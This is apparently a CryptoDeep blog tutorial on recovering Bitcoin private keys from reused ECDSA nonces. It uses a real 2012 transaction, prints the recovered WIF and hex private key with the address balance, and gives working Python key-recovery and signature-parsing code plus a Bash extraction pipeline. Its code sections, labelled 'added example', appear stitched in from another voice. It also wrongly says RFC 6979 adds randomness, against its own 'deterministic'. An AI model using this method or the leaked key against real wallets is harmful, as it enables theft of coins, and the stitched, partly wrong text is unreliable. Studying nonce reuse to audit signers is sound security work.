
The very first serious vulnerability in Blockchain and how to get the public key Bitcoin ECDSA RSZ value from the RawTX file

By CryptoDeep | CRYPTODEEP | 3 Sep 2022



In this article we will talk about extracting the ECDSA signature values R, S, Z from the Bitcoin blockchain, but first let’s recall the very first serious vulnerability in a blockchain transaction, discovered by Nils Schneider (aka tcatm), a Bitcoin developer and the owner of «BitcoinWatch» and «BitcoinCharts».

4.1 History of dangerous random attacks on Bitcoin

Document [PDF]: Private Key Recovery Combination Attacks: On Extreme Fragility of Popular Bitcoin Key Management, Wallet and Cold Storage Solutions in Presence of Poor RNG Events

On December 25, 2012, Nils discovered a potential weakness in some Bitcoin blockchain transactions.

Look at this transaction:

transaction: 9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1



input script 1:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

input script 2:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

This transaction has two inputs and one output.
If you look closely at the two input scripts, you will notice that there are quite a few identical bytes at the beginning and at the end.
Those bytes at the end are the hex-encoded public key of the address whose coins are being spent, so there’s nothing wrong with that.
However, the first half of each script is the actual signature (r, s):

r1: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
r2: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1

s1: 44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2: 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab

As you can see, r1 is the same as r2. This is a huge problem.

We can recover the private key for this public key:

04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

To do this, we can use a simple formula from school algebra 😉

private key = (z1*s2 - z2*s1)/(r*(s1-s2))

We just need to find z1 and z2.

These are the hashes of the outputs that need to be signed. Let’s take the output transactions and compute them (as computed by OP_CHECKSIG):

z1: c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2: 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc

Next, we pack all these values into one Python script: vulnerabilityR.py

Python script: vulnerabilityR.py

Here p is simply the order of the generator G, a parameter of the secp256k1 curve used by Bitcoin.

Let’s create a field for our calculations:

K = GF(p)
K((z1*s2 - z2*s1)/(r*(s1-s2)))

Let’s run the script: python3 vulnerabilityR.py

Next, our script vulnerabilityR.py will calculate the private key in this field:

ADDR: 1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm
WIF:  5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ
hex:  c477f9f65c22cce20657faa5b2d1d8122336f851a508a1ed04e479c34985bf96
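To reproduce the calculation above outside Sage, here is an added Python example (it is not the page’s vulnerabilityR.py) that applies the same formula modulo the curve order using the r, s1, s2, z1, z2 and public-key values quoted on this page, and then checks its own result: the recovered nonce must reproduce r as the x-coordinate of k·G, and d·G must equal the public key taken from the input script. The curve arithmetic is a plain affine double-and-add written for this example only.

```python
# Added example (not the page's vulnerabilityR.py): reproduce the repeated-r
# recovery in plain Python, then verify the recovered key against the curve.
# All r, s1, s2, z1, z2 and public-key values are copied from the page.

# secp256k1 domain parameters (Bitcoin's curve)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + 7 over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # P + (-P)
    if p1 == p2:
        lam = (3 * x1 * x1) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def ec_mul(k, point):
    """Double-and-add scalar multiplication (not constant-time; fine for verification)."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def recover_nonce(r, s1, s2, z1, z2):
    # From s_i = k^-1 (z_i + r d): subtracting the two equations eliminates d.
    return (z1 - z2) * pow(s1 - s2, -1, N) % N


def recover_private_key(r, s1, s2, z1, z2):
    # The page's formula, evaluated modulo n: d = (z1*s2 - z2*s1) / (r*(s1 - s2))
    return (z1 * s2 - z2 * s1) * pow(r * (s1 - s2), -1, N) % N


def verify_recovery(r, s1, s2, z1, z2, pubkey_hex):
    """Return (priv_hex, ok); ok is True only if the key reproduces r and the public key."""
    k = recover_nonce(r, s1, s2, z1, z2)
    d = recover_private_key(r, s1, s2, z1, z2)
    # Check 1: the nonce must reproduce r as the x-coordinate of k*G (mod n).
    rx = ec_mul(k, G)[0] % N
    # Check 2: d must satisfy both signature equations.
    sig_ok = all(pow(k, -1, N) * (z + r * d) % N == s for z, s in ((z1, s1), (z2, s2)))
    # Check 3: d*G must equal the uncompressed public key from the input script.
    px, py = ec_mul(d, G)
    pub_ok = "04" + format(px, "064x") + format(py, "064x") == pubkey_hex.lower()
    return format(d, "064x"), (rx == r and sig_ok and pub_ok)


# Values quoted on the page for transaction 9ec4bc49...c4b1
R = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
S1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
S2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
Z1 = 0xc0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
Z2 = 0x17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
PUBKEY = ("04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81"
          "ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff")

if __name__ == "__main__":
    priv, ok = verify_recovery(R, S1, S2, Z1, Z2, PUBKEY)
    print("private key hex:", priv)
    print("consistent with curve and public key:", ok)
```

The two curve-level checks are what make the result trustworthy: if the z values were computed with the wrong sighash serialization, the formula still yields a number, but d·G will not match the public key. The same property is the reason a signer must never emit two signatures with the same r under one key, which is exactly what RFC 6979 (discussed below) prevents.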

Checking the private key on the bitaddress website

Private key found!

https://www.blockchain.com/btc/address/1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm

0.1638109 BTC

Of course, the developers of Bitcoin fixed this vulnerability by introducing deterministic functions.

This RFC 6979 feature introduces an element of randomness into the Bitcoin ECDSA signature, which enhances the cryptographic strength of the transaction.

Document [PDF]: RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)


As we know from practice, there are quite different vulnerable transactions in the Bitcoin blockchain.

We previously published an article: “One weak transaction in ECDSA on the Bitcoin blockchain and with the help of Lattice Attack we received a Private Key to BTC coins”

https://habr.com/ru/post/671932/

Now let’s get the Bitcoin ECDSA public key and the R, S, Z values ourselves from the «RawTX.json» file (which we obtained in 01BlockchainGoogleDrive).

Commands, files, and our Bash script code: getsign.sh

So let’s look at the whole work of the Bash script getsign.sh in detail:

cat RawTX.json > index.json

We make a copy of the file RawTX.json into a new file index.json.

for run in {1..4}; do

We open a loop over {1..4} because we take 4 lines from the file index.json.

export LINE=1 ; sed -n "${LINE}p" index.json > index2.json

export sets LINE=1, and sed -n prints line #1 of index.json into a new file index2.json.

sed -i '1d' index.json

The utility sed then removes line #1 from the file index.json.

The echo utility creates a Python script for us: fileopen.py

python3 fileopen.py

We run the Python script fileopen.py, which creates a new Bash script: signscript.sh

chmod +x signscript.sh
./signscript.sh

We grant execute rights to the Bash script signscript.sh and run it.

As a result, the breakECDSA.py Python script is launched, which extracts the R, S, Z values and the Bitcoin public key from RawTX.

All of this is saved to the file "signatures.json".

File «signatures.json»: Bitcoin public key and R, S, Z values

rm signscript.sh
rm fileopen.py

The utility rm removes the Python script fileopen.py and the Bash script signscript.sh, so the next iteration regenerates them for the next line.

done

As a result, everything ends after 4 loop iterations.

rm index.json

The loop closes and the utility rm deletes index.json.

The Bash script getsign.sh finishes its work!
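The getsign.sh pipeline above ultimately pulls R, S and the public key out of each input’s signature script. As an added, self-contained Python example (not the project’s breakECDSA.py), the following parser decodes the DER signature, the sighash byte and the public key from the two input scripts quoted earlier on this page, and flags any r value that recurs across inputs, which is the detection signal behind the whole article. The page prints the scripts without the push opcodes a real scriptSig carries, so the parser accepts both layouts. Z is deliberately not computed here: the sighash needs the previous output’s scriptPubKey and the full transaction serialization, which the page does not reproduce.

```python
# Added example (not the project's breakECDSA.py): parse the signature part of a
# pay-to-pubkey-hash input script into (r, s, sighash type, public key) and flag
# any r value that recurs across inputs of one transaction. The two input scripts
# below are copied from the page; the page gives them without the push opcodes a
# real scriptSig carries, so both layouts are handled.


def parse_der_signature(sig: bytes):
    """Decode DER SEQUENCE { INTEGER r, INTEGER s }; return (r, s, bytes consumed)."""
    if len(sig) < 8 or sig[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    seq_len = sig[1]
    if seq_len + 2 > len(sig):
        raise ValueError("DER length exceeds buffer")
    pos, ints = 2, []
    for _ in range(2):
        if sig[pos] != 0x02:
            raise ValueError("expected DER INTEGER")
        length = sig[pos + 1]
        value = sig[pos + 2 : pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated DER INTEGER")
        # Canonical DER pads a high-bit value with 0x00; reading it as unsigned
        # big-endian gives the same integer either way (these 2012 signatures omit the pad).
        ints.append(int.from_bytes(value, "big"))
        pos += 2 + length
    if pos != seq_len + 2:
        raise ValueError("trailing bytes inside DER SEQUENCE")
    return ints[0], ints[1], pos


def parse_input_script(script_hex: str):
    """Return r, s, sighash and pubkey (hex) from sig||sighash||pubkey, with or without push opcodes."""
    data = bytes.fromhex(script_hex)
    if data[0] == 0x30:
        # Page layout: DER signature, one sighash byte, then the raw public key.
        r, s, consumed = parse_der_signature(data)
        sighash = data[consumed]
        pubkey = data[consumed + 1 :]
    else:
        # Real scriptSig layout: <push len> <sig||sighash> <push len> <pubkey>.
        sig_len = data[0]
        sig_blob = data[1 : 1 + sig_len]
        r, s, consumed = parse_der_signature(sig_blob)
        if consumed != sig_len - 1:
            raise ValueError("signature push must be DER + 1 sighash byte")
        sighash = sig_blob[-1]
        rest = data[1 + sig_len :]
        pubkey = rest[1 : 1 + rest[0]]
    if len(pubkey) not in (33, 65):
        raise ValueError("unexpected public key length %d" % len(pubkey))
    return {"r": r, "s": s, "sighash": sighash, "pubkey": pubkey.hex()}


def to_push_layout(script_hex: str) -> str:
    """Rebuild the real scriptSig (with push opcodes) from the page's opcode-less layout."""
    data = bytes.fromhex(script_hex)
    _, _, consumed = parse_der_signature(data)
    sig_blob, pubkey = data[: consumed + 1], data[consumed + 1 :]
    return (bytes([len(sig_blob)]) + sig_blob + bytes([len(pubkey)]) + pubkey).hex()


def find_reused_r(scripts):
    """Group input indexes by r; any group with 2+ entries means a repeated nonce."""
    by_r = {}
    for idx, script_hex in enumerate(scripts):
        by_r.setdefault(parse_input_script(script_hex)["r"], []).append(idx)
    return {r: idxs for r, idxs in by_r.items() if len(idxs) > 1}


# The two input scripts of transaction 9ec4bc49...c4b1 as printed on the page.
INPUT_SCRIPTS = [
    "30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1"
    "022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e01"
    "04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81"
    "ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff",
    "30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1"
    "02209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab01"
    "04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81"
    "ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff",
]

if __name__ == "__main__":
    for i, script in enumerate(INPUT_SCRIPTS):
        print(i, {k: (format(v, "x") if isinstance(v, int) else v)
                  for k, v in parse_input_script(script).items()})
    print("repeated r:", {format(r, "x"): idxs for r, idxs in find_reused_r(INPUT_SCRIPTS).items()})
```

A non-empty result from find_reused_r is the audit trigger: in the page’s case the repeat happens inside one transaction, but the same check applies to every signature ever published under one public key, and any hit should be treated as a compromised key whose funds need to be moved.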

Now we have learned how to:

  • Get the Bitcoin public key from an ECDSA signature
  • Get the R, S, Z values from an ECDSA signature
  • Apply them for cryptanalysis

Source code:  https://github.com/demining/CryptoDeepTools/blob/main/02BreakECDSAcryptography

Telegram:  https://t.me/cryptodeeptech

Video:  https://youtu.be/BYd-cuFRZmM

Source: https://cryptodeeptech.ru/break-ecdsa-cryptography

   
